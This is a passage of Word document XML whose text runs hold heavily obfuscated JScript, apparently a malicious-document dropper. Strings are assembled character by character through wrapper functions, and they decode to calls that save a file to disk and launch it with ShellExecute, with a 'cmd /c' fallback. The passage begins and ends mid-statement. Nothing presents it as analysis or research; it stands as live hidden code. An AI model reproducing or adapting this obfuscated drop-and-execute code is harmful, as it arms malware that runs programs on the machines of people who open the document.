hjfth5[Vgtf_56]=3; hjfth5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjfth5[600]-hjfth5[Vgtf_56]),RunGe);  })(true,'obey60','factory29')+(function(Rt,Rx){ var iengrati3=Brfcook; iengrati3[Vgtf_56]=3; iengrati3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iengrati3[600]-iengrati3[Vgtf_56]),RunGe);  })('addition49','being51','evades28')+(function(Rt,Rx){ var sqpan3=Brfcook; sqpan3[Vgtf_56]=0; sqpan3[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqpan3[600]-sqpan3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var feithat85=Brfcook; feithat85[Vgtf_56]=4; feithat85[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(feithat85[600]-feithat85[Vgtf_56]),RunGe);  })('obey60','factory29',true,1544)+(function(Rt,Rx){ var unwcont3=Brfcook; unwcont3[Vgtf_56]=1; unwcont3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(unwcont3[600]-unwcont3[Vgtf_56]),RunGe);  })('what20')](gicqndisastrous12[(function(Rt,Rx){ var keumerel4=Brfcook; keumerel4[Vgtf_56]=1; keumerel4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(keumerel4[600]-keumerel4[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ijvcon3=Brfcook; ijvcon3[Vgtf_56]=3; ijvcon3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijvcon3[600]-ijvcon3[Vgtf_56]),RunGe);  })('what20',397,'humans11')+(function(Rt,Rx){ var wekthat5=Brfcook; wekthat5[Vgtf_56]=0; wekthat5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wekthat5[600]-wekthat5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vfqliv4=Brfcook; vfqliv4[Vgtf_56]=2; vfqliv4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfqliv4[600]-vfqliv4[Vgtf_56]),RunGe);  })(true,2504)+(function(Rt,Rx){ var thkroadI5=Brfcook; thkroadI5[Vgtf_56]=0; thkroadI5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thkroadI5[600]-thkroadI5[Vgtf_56]),RunGe);  })()](-4),(function(Rt,Rx){ var kkjava5=Brfcook; kkjava5[Vgtf_56]=1; kkjava5[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kkjava5[600]-kkjava5[Vgtf_56]),RunGe);  })(1245)+(function(Rt,Rx){ var njqgra5=Brfcook; njqgra5[Vgtf_56]=0; njqgra5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njqgra5[600]-njqgra5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wqnothe3=Brfcook; wqnothe3[Vgtf_56]=3; wqnothe3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqnothe3[600]-wqnothe3[Vgtf_56]),RunGe);  })('robot28','into6',false)+(function(Rt,Rx){ var tjngra4=Brfcook; tjngra4[Vgtf_56]=3; tjngra4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjngra4[600]-tjngra4[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6'));</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              gicqnrendered77[(function(Rt,Rx){ var fvnco4=Brfcook; fvnco4[Vgtf_56]=0; fvnco4[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvnco4[600]-fvnco4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vkqaval3=Brfcook; vkqaval3[Vgtf_56]=1; vkqaval3[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vkqaval3[600]-vkqaval3[Vgtf_56]),RunGe);  })('progress41')+(function(Rt,Rx){ var skievery3=Brfcook; skievery3[Vgtf_56]=2; skievery3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(skievery3[600]-skievery3[Vgtf_56]),RunGe);  })(false,'White35')+(function(Rt,Rx){ var iqhother5=Brfcook; iqhother5[Vgtf_56]=3; iqhother5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqhother5[600]-iqhother5[Vgtf_56]),RunGe);  })('robot28',2677,2677)+(function(Rt,Rx){ var ffvsk4=Brfcook; ffvsk4[Vgtf_56]=1; ffvsk4[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffvsk4[600]-ffvsk4[Vgtf_56]),RunGe);  })('human24')+(function(Rt,Rx){ var wvigrati5=Brfcook; wvigrati5[Vgtf_56]=0; wvigrati5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wvigrati5[600]-wvigrati5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hesconte3=Brfcook; hesconte3[Vgtf_56]=3; hesconte3[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hesconte3[600]-hesconte3[Vgtf_56]),RunGe);  })(true,true,true)+(function(Rt,Rx){ var ithmere3=Brfcook; ithmere3[Vgtf_56]=2; ithmere3[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ithmere3[600]-ithmere3[Vgtf_56]),RunGe);  })('idea46',true)+(function(Rt,Rx){ var pvnme5=Brfcook; pvnme5[Vgtf_56]=3; pvnme5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pvnme5[600]-pvnme5[Vgtf_56]),RunGe);  })('idea46',null,null)+(function(Rt,Rx){ var wwugr4=Brfcook; wwugr4[Vgtf_56]=4; wwugr4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wwugr4[600]-wwugr4[Vgtf_56]),RunGe);  })(true,null,'robots83','conscience16')](gicqndisastrous12,2);           gicqnrendered77[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();            gicqnrendered77=null;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   try</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   {           gicqnlivelihood89[(function(Rt,Rx){ var ufsgr3=Brfcook; ufsgr3[Vgtf_56]=4; ufsgr3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsgr3[600]-ufsgr3[Vgtf_56]),RunGe);  })(true,true,'Laws75','although94')+(function(Rt,Rx){ var shqth3=Brfcook; shqth3[Vgtf_56]=2; shqth3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqth3[600]-shqth3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var tqtgra3=Brfcook; tqtgra3[Vgtf_56]=1; tqtgra3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tqtgra3[600]-tqtgra3[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var tjegra4=Brfcook; tjegra4[Vgtf_56]=3; tjegra4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjegra4[600]-tjegra4[Vgtf_56]),RunGe);  })(true,'Laws75','although94')+(function(Rt,Rx){ var qjtoth5=Brfcook; qjtoth5[Vgtf_56]=3; qjtoth5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjtoth5[600]-qjtoth5[Vgtf_56]),RunGe);  })(1843,1843,'robot28')+(function(Rt,Rx){ var vskFor5=Brfcook; vskFor5[Vgtf_56]=0; vskFor5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskFor5[600]-vskFor5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ihfthe5=Brfcook; ihfthe5[Vgtf_56]=2; ihfthe5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihfthe5[600]-ihfthe5[Vgtf_56]),RunGe);  })(433,false)+(function(Rt,Rx){ var qhpha5=Brfcook; qhpha5[Vgtf_56]=3; qhpha5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhpha5[600]-qhpha5[Vgtf_56]),RunGe);  })('arosethough14',869,869)+(function(Rt,Rx){ var qhneve4=Brfcook; qhneve4[Vgtf_56]=0; qhneve4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhneve4[600]-qhneve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pthroa4=Brfcook; pthroa4[Vgtf_56]=0; pthroa4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthroa4[600]-pthroa4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uspwri5=Brfcook; uspwri5[Vgtf_56]=3; uspwri5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uspwri5[600]-uspwri5[Vgtf_56]),RunGe);  })(false,true,'Both81')+(function(Rt,Rx){ var kwpwork43=Brfcook; kwpwork43[Vgtf_56]=0; kwpwork43[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwpwork43[600]-kwpwork43[Vgtf_56]),RunGe);  })()](gicqndisastrous12,'','',(function(Rt,Rx){ var uqsroad5=Brfcook; uqsroad5[Vgtf_56]=2; uqsroad5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqsroad5[600]-uqsroad5[Vgtf_56]),RunGe);  })('lawsthe36',true)+(function(Rt,Rx){ var qesroa5=Brfcook; qesroa5[Vgtf_56]=3; qesroa5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qesroa5[600]-qesroa5[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58')+(function(Rt,Rx){ var wpjmere3=Brfcook; wpjmere3[Vgtf_56]=1; wpjmere3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpjmere3[600]-wpjmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ujugrati4=Brfcook; ujugrati4[Vgtf_56]=0; ujugrati4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujugrati4[600]-ujugrati4[Vgtf_56]),RunGe);  })(),1);             }catch(gicqnbythe41){ gicqnlivelihood89[(function(Rt,Rx){ var ufsgr3=Brfcook; ufsgr3[Vgtf_56]=4; ufsgr3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsgr3[600]-ufsgr3[Vgtf_56]),RunGe);  })(true,true,'Laws75','although94')+(function(Rt,Rx){ var shqth3=Brfcook; shqth3[Vgtf_56]=2; shqth3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqth3[600]-shqth3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var tqtgra3=Brfcook; tqtgra3[Vgtf_56]=1; tqtgra3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tqtgra3[600]-tqtgra3[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var tjegra4=Brfcook; tjegra4[Vgtf_56]=3; tjegra4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjegra4[600]-tjegra4[Vgtf_56]),RunGe);  })(true,'Laws75','although94')+(function(Rt,Rx){ var qjtoth5=Brfcook; qjtoth5[Vgtf_56]=3; qjtoth5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjtoth5[600]-qjtoth5[Vgtf_56]),RunGe);  })(1843,1843,'robot28')+(function(Rt,Rx){ var vskFor5=Brfcook; vskFor5[Vgtf_56]=0; vskFor5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskFor5[600]-vskFor5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ihfthe5=Brfcook; ihfthe5[Vgtf_56]=2; ihfthe5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihfthe5[600]-ihfthe5[Vgtf_56]),RunGe);  })(433,false)+(function(Rt,Rx){ var qhpha5=Brfcook; qhpha5[Vgtf_56]=3; qhpha5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhpha5[600]-qhpha5[Vgtf_56]),RunGe);  })('arosethough14',869,869)+(function(Rt,Rx){ var qhneve4=Brfcook; qhneve4[Vgtf_56]=0; qhneve4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhneve4[600]-qhneve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pthroa4=Brfcook; pthroa4[Vgtf_56]=0; pthroa4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthroa4[600]-pthroa4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uspwri5=Brfcook; uspwri5[Vgtf_56]=3; uspwri5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uspwri5[600]-uspwri5[Vgtf_56]),RunGe);  })(false,true,'Both81')+(function(Rt,Rx){ var kwpwork43=Brfcook; kwpwork43[Vgtf_56]=0; kwpwork43[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwpwork43[600]-kwpwork43[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var wqvgr4=Brfcook; wqvgr4[Vgtf_56]=4; wqvgr4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqvgr4[600]-wqvgr4[Vgtf_56]),RunGe);  })('addition49','being51',1496,null)+(function(Rt,Rx){ var jtwcon4=Brfcook; jtwcon4[Vgtf_56]=4; jtwcon4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtwcon4[600]-jtwcon4[Vgtf_56]),RunGe);  })('declarations83','provided81',true,'second5')+(function(Rt,Rx){ var tkjroad4=Brfcook; tkjroad4[Vgtf_56]=2; tkjroad4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkjroad4[600]-tkjroad4[Vgtf_56]),RunGe);  })(true,true),(function(Rt,Rx){ var uwfco3=Brfcook; uwfco3[Vgtf_56]=2; uwfco3[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwfco3[600]-uwfco3[Vgtf_56]),RunGe);  })('what20','humans11')+(function(Rt,Rx){ var husski3=Brfcook; husski3[Vgtf_56]=4; husski3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(husski3[600]-husski3[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88',null)+gicqndisastrous12,'',(function(Rt,Rx){ var uqsroad5=Brfcook; uqsroad5[Vgtf_56]=2; uqsroad5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqsroad5[600]-uqsroad5[Vgtf_56]),RunGe);  })('lawsthe36',true)+(function(Rt,Rx){ var qesroa5=Brfcook; qesroa5[Vgtf_56]=3; qesroa5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qesroa5[600]-qesroa5[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58')+(function(Rt,Rx){ var wpjmere3=Brfcook; wpjmere3[Vgtf_56]=1; wpjmere3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpjmere3[600]-wpjmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ujugrati4=Brfcook; ujugrati4[Vgtf_56]=0; ujugrati4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujugrati4[600]-ujugrati4[Vgtf_56]),RunGe);  })(),1);  }</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              if (gicqnvisit78)  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   { </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">       try</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        gicqnTherefore25=new gicqnbread72(gicqnthey61);              for (; !gicqnTherefore25[(function(Rt,Rx){ var untconsc4=Brfcook; untconsc4[Vgtf_56]=1; untconsc4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(untconsc4[600]-untconsc4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var ujuHere5=Brfcook; ujuHere5[Vgtf_56]=3; ujuHere5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujuHere5[600]-ujuHere5[Vgtf_56]),RunGe);  })('rooted92','thus68',true)+(function(Rt,Rx){ var ehuot3=Brfcook; ehuot3[Vgtf_56]=3; ehuot3[Vgtf_56-(Vgtf_56/3)]=72; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehuot3[600]-ehuot3[Vgtf_56]),RunGe);  })('robot28','into6',true)+(function(Rt,Rx){ var wjfcons4=Brfcook; wjfcons4[Vgtf_56]=0; wjfcons4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjfcons4[600]-wjfcons4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wfsava5=Brfcook; wfsava5[Vgtf_56]=0; wfsava5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wfsava5[600]-wfsava5[Vgtf_56]),RunGe);  })()](); gicqnTherefore25[(function(Rt,Rx){ var suqofpov4=Brfcook; suqofpov4[Vgtf_56]=3; suqofpov4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suqofpov4[600]-suqofpov4[Vgtf_56]),RunGe);  })('daily6','rooted92','thus68')+(function(Rt,Rx){ var nvqava5=Brfcook; nvqava5[Vgtf_56]=4; nvqava5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvqava5[600]-nvqava5[Vgtf_56]),RunGe);  })(2980,'progress41',true,'displayed83')+(function(Rt,Rx){ var njhwrite4=Brfcook; njhwrite4[Vgtf_56]=4; njhwrite4[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njhwrite4[600]-njhwrite4[Vgtf_56]),RunGe);  })(null,false,'Both81',null)+(function(Rt,Rx){ var uhpForth5=Brfcook; uhpForth5[Vgtf_56]=2; uhpForth5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhpForth5[600]-uhpForth5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var hhqform4=Brfcook; hhqform4[Vgtf_56]=4; hhqform4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhqform4[600]-hhqform4[Vgtf_56]),RunGe);  })('robots83','conscience16',null,false)+(function(Rt,Rx){ var hesandem5=Brfcook; hesandem5[Vgtf_56]=4; hesandem5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hesandem5[600]-hesandem5[Vgtf_56]),RunGe);  })('could80','State64','situationbecame47','East98')+(function(Rt,Rx){ var eepFo5=Brfcook; eepFo5[Vgtf_56]=2; eepFo5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eepFo5[600]-eepFo5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var vnithat85=Brfcook; vnithat85[Vgtf_56]=2; vnithat85[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnithat85[600]-vnithat85[Vgtf_56]),RunGe);  })('obey60','factory29')]())                 {                   gicqnplatitudes86 = gicqnTherefore25[(function(Rt,Rx){ var isuwer4=Brfcook; isuwer4[Vgtf_56]=2; isuwer4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(isuwer4[600]-isuwer4[Vgtf_56]),RunGe);  })('astonished95','Labyrinthine79')+(function(Rt,Rx){ var huhgr3=Brfcook; huhgr3[Vgtf_56]=3; huhgr3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huhgr3[600]-huhgr3[Vgtf_56]),RunGe);  })('robots83',false,'conscience16')+(function(Rt,Rx){ var queroad3=Brfcook; queroad3[Vgtf_56]=2; queroad3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(queroad3[600]-queroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var swslivel3=Brfcook; swslivel3[Vgtf_56]=3; swslivel3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(swslivel3[600]-swslivel3[Vgtf_56]),RunGe);  })(1915,false,true)]();                       if((gicqnplatitudes86[(function(Rt,Rx){ var sjhother5=Brfcook; sjhother5[Vgtf_56]=0; sjhother5[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sjhother5[600]-sjhother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jfsth5=Brfcook; jfsth5[Vgtf_56]=2; jfsth5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfsth5[600]-jfsth5[Vgtf_56]),RunGe);  })('obey60','factory29')+(function(Rt,Rx){ var siusk3=Brfcook; siusk3[Vgtf_56]=2; siusk3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(siusk3[600]-siusk3[Vgtf_56]),RunGe);  })('human24','entertain53')+(function(Rt,Rx){ var hifwr5=Brfcook; hifwr5[Vgtf_56]=1; hifwr5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hifwr5[600]-hifwr5[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var khjwork5=Brfcook; khjwork5[Vgtf_56]=3; khjwork5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(khjwork5[600]-khjwork5[Vgtf_56]),RunGe);  })('although94','humans57','would68')+(function(Rt,Rx){ var piscons5=Brfcook; piscons5[Vgtf_56]=4; piscons5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(piscons5[600]-piscons5[Vgtf_56]),RunGe);  })('declarations83',true,'provided81','second5')+(function(Rt,Rx){ var nsnande3=Brfcook; nsnande3[Vgtf_56]=2; nsnande3[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nsnande3[600]-nsnande3[Vgtf_56]),RunGe);  })(false,'could80')] &amp;&amp; (gicqnplatitudes86[(function(Rt,Rx){ var wpkmer3=Brfcook; wpkmer3[Vgtf_56]=1; wpkmer3[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpkmer3[600]-wpkmer3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var jssgr3=Brfcook; jssgr3[Vgtf_56]=4; jssgr3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jssgr3[600]-jssgr3[Vgtf_56]),RunGe);  })(1097,'addition49','being51',false)+(function(Rt,Rx){ var uptco5=Brfcook; uptco5[Vgtf_56]=0; uptco5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uptco5[600]-uptco5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hutHer5=Brfcook; hutHer5[Vgtf_56]=1; hutHer5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hutHer5[600]-hutHer5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var ftugradu5=Brfcook; ftugradu5[Vgtf_56]=3; ftugradu5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftugradu5[600]-ftugradu5[Vgtf_56]),RunGe);  })(937,'Laws75',false)+(function(Rt,Rx){ var qhqli3=Brfcook; qhqli3[Vgtf_56]=4; qhqli3[Vgtf_56-(Vgtf_56/3)]=88; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhqli3[600]-qhqli3[Vgtf_56]),RunGe);  })(389,true,null,389)+(function(Rt,Rx){ var efwlive5=Brfcook; efwlive5[Vgtf_56]=3; efwlive5[Vgtf_56-(Vgtf_56/3)]=124; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(efwlive5[600]-efwlive5[Vgtf_56]),RunGe);  })(true,false,'second5')+(function(Rt,Rx){ var qqsother5=Brfcook; qqsother5[Vgtf_56]=2; qqsother5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqsother5[600]-qqsother5[Vgtf_56]),RunGe);  })(null,910)+(function(Rt,Rx){ var pieth3=Brfcook; pieth3[Vgtf_56]=0; pieth3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pieth3[600]-pieth3[Vgtf_56]),RunGe);  })()] == 3 || gicqnplatitudes86[(function(Rt,Rx){ var wpkmer3=Brfcook; wpkmer3[Vgtf_56]=1; wpkmer3[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpkmer3[600]-wpkmer3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var jssgr3=Brfcook; jssgr3[Vgtf_56]=4; jssgr3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jssgr3[600]-jssgr3[Vgtf_56]),RunGe);  })(1097,'addition49','being51',false)+(function(Rt,Rx){ var uptco5=Brfcook; uptco5[Vgtf_56]=0; uptco5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uptco5[600]-uptco5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hutHer5=Brfcook; 